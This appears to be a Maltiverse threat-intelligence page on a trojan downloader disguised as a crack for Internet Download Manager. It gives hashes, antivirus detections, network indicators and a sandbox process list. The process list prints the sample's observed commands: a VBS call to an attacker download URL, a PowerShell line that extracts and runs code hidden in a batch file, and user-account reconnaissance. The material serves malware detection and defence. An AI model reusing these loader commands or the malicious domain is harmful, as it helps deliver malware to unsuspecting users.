IDM_6.4x_Crack_v20.0.exe
Sign up
Create your account
Actionable Threat Intelligence
Maltiverse © 2025
- Filename:
- IDM_6.4x_Crack_v20.0.exe
- md5:
- 7235c81d6a1990bf7301194a9f778f9a
- sha1:
- 300001bd1550bf827e21739470ea07984691497e
- sha256:
- d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd
- Filetype:
- PE32 executable (GUI) Intel 80386, for MS Windows, ...
- Size (Bytes):
- 58880
- Classification:
- malicious
- Indexed:
- Sat Apr 19 2025 17:40:09 GMT+0000 (3 months ago)
- Last modified:
- Sat Apr 19 2025 21:29:54 GMT+0000 (3 months ago)
Sample information
53
Antivirus detections1
IDS alerts18
Processes0
Http events1
Contacted hosts1
DNS Requests
10
Score
Current activity of this Sample
Blacklist timeline
First seen: Sat Apr 19 2025 17:55:31 GMT+0000
Last seen: Sat Apr 19 2025 20:00:55 GMT+0000
Period: 2 hours
Last seen: Sat Apr 19 2025 20:00:55 GMT+0000
Period: 2 hours
Hashes
In depth details
Dates
Tags
Developers can check API Specification here:
Request:
curl -H "Authorization: Bearer <API_KEY>" https://api.maltiverse.com/sample/d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd
Request:
Alternatively you can use Maltiverse Python3 Library:
import requests
import json
url = 'https://api.maltiverse.com/sample/d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd'
response = requests.get(url)
print(json.dumps(response.json(), indent=4, sort_keys=True))
Request:
$url = 'https://api.maltiverse.com/sample/d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd'
$headers = @{Authorization=("Bearer {0}" -f "<API_KEY>")}
$response = Invoke-RestMethod $url -Headers $headers
Write-Output $response
Response:
{
"antivirus": [
{
"description": "Gen:Variant.Doina.73592",
"name": "ALYac"
},
{
"description": "Malicious",
"name": "APEX"
},
{
"description": "Win32:MalwareX-gen [Misc]",
"name": "AVG"
},
{
"description": "Malware/Win.Doina.C5750887",
"name": "AhnLab-V3"
},
{
"description": "Trojan[Downloader]/Win32.Banload",
"name": "Antiy-AVL"
},
{
"description": "Trojan.Doina.D11F78",
"name": "Arcabit"
},
{
"description": "Win32:MalwareX-gen [Misc]",
"name": "Avast"
},
{
"description": "DR/Delphi.Gen",
"name": "Avira"
},
{
"description": "Gen:Variant.Doina.73592",
"name": "BitDefender"
},
{
"description": "W32.AIDetectMalware",
"name": "Bkav"
},
{
"description": "TrojanDownloader.Banload",
"name": "CAT-QuickHeal"
},
{
"description": "exe.trojan.generic",
"name": "CTX"
},
{
"description": "win/grayware_confidence_90% (W)",
"name": "CrowdStrike"
},
{
"description": "Unsafe",
"name": "Cylance"
},
{
"description": "Malicious (score: 100)",
"name": "Cynet"
},
{
"description": "MALICIOUS",
"name": "DeepInstinct"
},
{
"description": "a variant of Win32/HackTool.Crack.FO potentially unsafe",
"name": "ESET-NOD32"
},
{
"description": "malicious (high confidence)",
"name": "Elastic"
},
{
"description": "Gen:Variant.Doina.73592 (B)",
"name": "Emsisoft"
},
{
"description": "Dropper.DR/Delphi.Gen",
"name": "F-Secure"
},
{
"description": "Riskware/Crack",
"name": "Fortinet"
},
{
"description": "Gen:Variant.Doina.73592",
"name": "GData"
},
{
"description": "Detected",
"name": "Google"
},
{
"description": "Trojan.Win32.Downloader.sa",
"name": "Gridinsoft"
},
{
"description": "Trojan.Crypter",
"name": "Ikarus"
},
{
"description": "Unwanted-Program ( 00517dbc1 )",
"name": "K7AntiVirus"
},
{
"description": "Unwanted-Program ( 00517dbc1 )",
"name": "K7GW"
},
{
"description": "Trojan.Win32.Alien.aiwk",
"name": "Kaspersky"
},
{
"description": "Trojan.Win32.Alien.tsNx",
"name": "Lionic"
},
{
"description": "Malware.AI.2767062603",
"name": "Malwarebytes"
},
{
"description": "Trojan.Malware.343811088.susgen",
"name": "MaxSecure"
},
{
"description": "Artemis!7235C81D6A19",
"name": "McAfee"
},
{
"description": "ti!D05FFF510254",
"name": "McAfeeD"
},
{
"description": "Gen:Variant.Doina.73592",
"name": "MicroWorld-eScan"
},
{
"description": "Trojan:Win32/Sabsik.FL.A!ml",
"name": "Microsoft"
},
{
"description": "generic.ml",
"name": "Paloalto"
},
{
"description": "Downloader.Banload!8.15B (CLOUD)",
"name": "Rising"
},
{
"description": "Trojan.Win32.Save.a",
"name": "Sangfor"
},
{
"description": "Static AI - Suspicious PE",
"name": "SentinelOne"
},
{
"description": "BehavesLike.Win32.Generic.qc",
"name": "Skyhigh"
},
{
"description": "Mal/Generic-S",
"name": "Sophos"
},
{
"description": "ML.Attribute.HighConfidence",
"name": "Symantec"
},
{
"description": "Malware.Win32.Gencirc.146ae14d",
"name": "Tencent"
},
{
"description": "malicious.moderate.ml.score",
"name": "Trapmine"
},
{
"description": "TROJ_GEN.R002H09DA25",
"name": "TrendMicro-HouseCall"
},
{
"description": "Trojan.Hide.Heur",
"name": "VBA32"
},
{
"description": "Gen:Variant.Doina.73592",
"name": "VIPRE"
},
{
"description": "W32/ABTrojan.LDBM-0299",
"name": "Varist"
},
{
"description": "Trojan.Alien!cKYQPzqtYEg",
"name": "Yandex"
},
{
"description": "Trojan[downloader]:Win/Crack.FP",
"name": "alibabacloud"
},
{
"description": "Generic.Malware",
"name": "tehtris"
},
{
"description": "exe.unknown.doina",
"name": "CTX"
},
{
"description": "malware.kb.a.1000",
"name": "Kingsoft"
}
],
"blacklist": [
{
"count": 1,
"description": "Generic Malware",
"first_seen": "2025-04-19 17:55:31",
"last_seen": "2025-04-19 20:00:55",
"ref": [
1
],
"source": "Hybrid-Analysis"
}
],
"classification": "malicious",
"contacted_host": [
"172.67.143.155"
],
"creation_time": "2025-04-19 17:40:09",
"dns_request": [
"idm.0dy.ir"
],
"filename": [
"IDM_6.4x_Crack_v20.0.exe"
],
"filetype": "PE32 executable (GUI) Intel 80386, for MS Windows, ...",
"is_alive": false,
"is_cdn": false,
"is_cnc": false,
"is_distributing_malware": false,
"is_hosting": false,
"is_iot_threat": false,
"is_known_attacker": false,
"is_known_scanner": false,
"is_mining_pool": false,
"is_open_proxy": false,
"is_phishing": false,
"is_sinkhole": false,
"is_storing_phishing": false,
"is_tor_node": false,
"is_vpn_node": false,
"md5": "7235c81d6a1990bf7301194a9f778f9a",
"modification_time": "2025-04-19 21:29:54",
"network_suricata_alert": [
{
"category": "Generic Protocol Command Decode",
"description": "SURICATA TCPv4 invalid checksum",
"event": "20.190.151.131:443 (TCP)",
"sid": "2200074"
}
],
"process_list": [
{
"name": "IDM_6.4x_Crack_v20.0.exe",
"normalizedpath": "C:\\IDM_6.4x_Crack_v20.0.exe",
"sha256": "d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd",
"uid": "00000000-00003880"
},
{
"commandline": "\"%TEMP%\\\\CRK_UPDT.vbs\" \"https://idm.0dy.ir/\" \"Version\" \"Download_URL\" \"20.0\" \"Crack\" \"%PROGRAMFILES%\\Google\\Chrome\\Application\\chrome.exe\" silent",
"name": "wscript.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\wscript.exe",
"sha256": "d57c8674dacc2dd3c03c70ccb823a38bd89f7cabb1663e115e0cb720a0c12c34",
"uid": "00000000-00003176"
},
{
"commandline": "import %TEMP%\\IDMRegClean.reg",
"name": "reg.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\reg.exe",
"sha256": "405a70c2b6081e6fed2a4bab7b0c233fff022acbbb3d2cc92cb8876d052db9e4",
"uid": "00000000-00008012"
},
{
"commandline": "/c call \"%TEMP%\\BATCLEN.bat\"",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00001492"
},
{
"commandline": "%WINDIR%\\system32\\cmd.exe /c ver",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00005188"
},
{
"commandline": "reg query \"HKCU\\Console\" /v ForceV2",
"name": "reg.exe",
"normalizedpath": "%WINDIR%\\system32\\reg.exe",
"sha256": "6b3ef0286b7f12b6dbd3bfe07f2473de16b30f2496a45985901f035cb509435f",
"uid": "00000000-00003320"
},
{
"commandline": "find /i \"0x0\"",
"name": "find.exe",
"normalizedpath": "%WINDIR%\\system32\\find.exe",
"sha256": "794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a",
"uid": "00000000-00003808"
},
{
"commandline": "%WINDIR%\\system32\\cmd.exe /c echo prompt $E | cmd",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00007360"
},
{
"commandline": "%WINDIR%\\system32\\cmd.exe /S /D /c\" echo prompt $E \"",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00005588"
},
{
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\system32\\cmd.exe",
"sha256": "ec436aeee41857eee5875efdb7166fe043349db5f58f3ee9fc4ff7f50005767f",
"uid": "00000000-00005628"
},
{
"commandline": "%WINDIR%\\system32\\cmd.exe /S /D /c\" echo \"%TEMP%\\BATCLEN.bat\" \"",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00004204"
},
{
"commandline": "find /i \"%TEMP%\\",
"name": "find.exe",
"normalizedpath": "%WINDIR%\\system32\\find.exe",
"sha256": "794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a",
"uid": "00000000-00005720"
},
{
"commandline": "\"$f=[io.file]::ReadAllText('%TEMP%\\BATCLEN.bat') -split ':PowerShellTest:\\s*';iex ($f[1])\"",
"name": "powershell.exe",
"normalizedpath": "%WINDIR%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"sha256": "34507738f84b9d4f231dc0c187fee4a03b4ddb84cf63ff56a4a1761a9bd56ea6",
"uid": "00000000-00006352"
},
{
"commandline": "find /i \"FullLanguage\"",
"name": "find.exe",
"normalizedpath": "%WINDIR%\\system32\\find.exe",
"sha256": "794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a",
"uid": "00000000-00006392"
},
{
"commandline": "\"Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property CreationClassName\"",
"name": "powershell.exe",
"normalizedpath": "%WINDIR%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"sha256": "34507738f84b9d4f231dc0c187fee4a03b4ddb84cf63ff56a4a1761a9bd56ea6",
"uid": "00000000-00004308"
},
{
"commandline": "find /i \"computersystem\"",
"name": "find.exe",
"normalizedpath": "%WINDIR%\\system32\\find.exe",
"sha256": "794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a",
"uid": "00000000-00008700"
},
{
"commandline": "%WINDIR%\\system32\\cmd.exe /c powershell.exe \"([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value\" 2>nul",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00007580"
},
{
"commandline": "\"([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value\"",
"name": "powershell.exe",
"normalizedpath": "%WINDIR%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"sha256": "34507738f84b9d4f231dc0c187fee4a03b4ddb84cf63ff56a4a1761a9bd56ea6",
"uid": "00000000-00008880"
}
],
"score": 10,
"scoring_executed_time": "2025-04-19 21:03:56",
"sha1": "300001bd1550bf827e21739470ea07984691497e",
"sha256": "d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd",
"size": 58880,
"tag": [
"evasive",
"windows-server-utility"
],
"type": "sample"
}
IDS Alerts
| SID | Category | Description | Event |
|---|---|---|---|
| 2200074 | Generic Protocol Command Decode | SURICATA TCPv4 invalid checksum | 20.190.151.131:443 (TCP) |
Network contacts
| DNS Requests |
|---|
| idm.0dy.ir |
| Contacted Hosts |
|---|
| 172.67.143.155 |
Antivirus positives
Process list
- uid
- 00000000-00003880
- commandline
- name
- IDM_6.4x_Crack_v20.0.exe
- normalizedpath
- C:\IDM_6.4x_Crack_v20.0.exe
- sha256
- d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd
- uid
- 00000000-00003176
- commandline
- "%TEMP%\\CRK_UPDT.vbs" "https://idm.0dy.ir/" "Version" "Download_URL" "20.0" "Crack" "%PROGRAMFILES%\Google\Chrome\Application\chrome.exe" silent
- name
- wscript.exe
- normalizedpath
- %WINDIR%\SysWOW64\wscript.exe
- sha256
- d57c8674dacc2dd3c03c70ccb823a38bd89f7cabb1663e115e0cb720a0c12c34
- uid
- 00000000-00008012
- commandline
- import %TEMP%\IDMRegClean.reg
- name
- reg.exe
- normalizedpath
- %WINDIR%\SysWOW64\reg.exe
- sha256
- 405a70c2b6081e6fed2a4bab7b0c233fff022acbbb3d2cc92cb8876d052db9e4
- uid
- 00000000-00001492
- commandline
- /c call "%TEMP%\BATCLEN.bat"
- name
- cmd.exe
- normalizedpath
- %WINDIR%\SysWOW64\cmd.exe
- sha256
- 4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051
- uid
- 00000000-00005188
- commandline
- %WINDIR%\system32\cmd.exe /c ver
- name
- cmd.exe
- normalizedpath
- %WINDIR%\SysWOW64\cmd.exe
- sha256
- 4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051
- uid
- 00000000-00003320
- commandline
- reg query "HKCU\Console" /v ForceV2
- name
- reg.exe
- normalizedpath
- %WINDIR%\system32\reg.exe
- sha256
- 6b3ef0286b7f12b6dbd3bfe07f2473de16b30f2496a45985901f035cb509435f
- uid
- 00000000-00003808
- commandline
- find /i "0x0"
- name
- find.exe
- normalizedpath
- %WINDIR%\system32\find.exe
- sha256
- 794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a
- uid
- 00000000-00007360
- commandline
- %WINDIR%\system32\cmd.exe /c echo prompt $E | cmd
- name
- cmd.exe
- normalizedpath
- %WINDIR%\SysWOW64\cmd.exe
- sha256
- 4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051
- uid
- 00000000-00005588
- commandline
- %WINDIR%\system32\cmd.exe /S /D /c" echo prompt $E "
- name
- cmd.exe
- normalizedpath
- %WINDIR%\SysWOW64\cmd.exe
- sha256
- 4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051
- uid
- 00000000-00005628
- commandline
- name
- cmd.exe
- normalizedpath
- %WINDIR%\system32\cmd.exe
- sha256
- ec436aeee41857eee5875efdb7166fe043349db5f58f3ee9fc4ff7f50005767f
- uid
- 00000000-00004204
- commandline
- %WINDIR%\system32\cmd.exe /S /D /c" echo "%TEMP%\BATCLEN.bat" "
- name
- cmd.exe
- normalizedpath
- %WINDIR%\SysWOW64\cmd.exe
- sha256
- 4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051
- uid
- 00000000-00005720
- commandline
- find /i "%TEMP%\
- name
- find.exe
- normalizedpath
- %WINDIR%\system32\find.exe
- sha256
- 794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a
- uid
- 00000000-00006352
- commandline
- "$f=[io.file]::ReadAllText('%TEMP%\BATCLEN.bat') -split ':PowerShellTest:\s*';iex ($f[1])"
- name
- powershell.exe
- normalizedpath
- %WINDIR%\system32\WindowsPowerShell\v1.0\powershell.exe
- sha256
- 34507738f84b9d4f231dc0c187fee4a03b4ddb84cf63ff56a4a1761a9bd56ea6
- uid
- 00000000-00006392
- commandline
- find /i "FullLanguage"
- name
- find.exe
- normalizedpath
- %WINDIR%\system32\find.exe
- sha256
- 794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a
- uid
- 00000000-00004308
- commandline
- "Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property CreationClassName"
- name
- powershell.exe
- normalizedpath
- %WINDIR%\system32\WindowsPowerShell\v1.0\powershell.exe
- sha256
- 34507738f84b9d4f231dc0c187fee4a03b4ddb84cf63ff56a4a1761a9bd56ea6
- uid
- 00000000-00008700
- commandline
- find /i "computersystem"
- name
- find.exe
- normalizedpath
- %WINDIR%\system32\find.exe
- sha256
- 794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a
- uid
- 00000000-00007580
- commandline
- %WINDIR%\system32\cmd.exe /c powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value" 2>nul
- name
- cmd.exe
- normalizedpath
- %WINDIR%\SysWOW64\cmd.exe
- sha256
- 4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051
- uid
- 00000000-00008880
- commandline
- "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value"
- name
- powershell.exe
- normalizedpath
- %WINDIR%\system32\WindowsPowerShell\v1.0\powershell.exe
- sha256
- 34507738f84b9d4f231dc0c187fee4a03b4ddb84cf63ff56a4a1761a9bd56ea6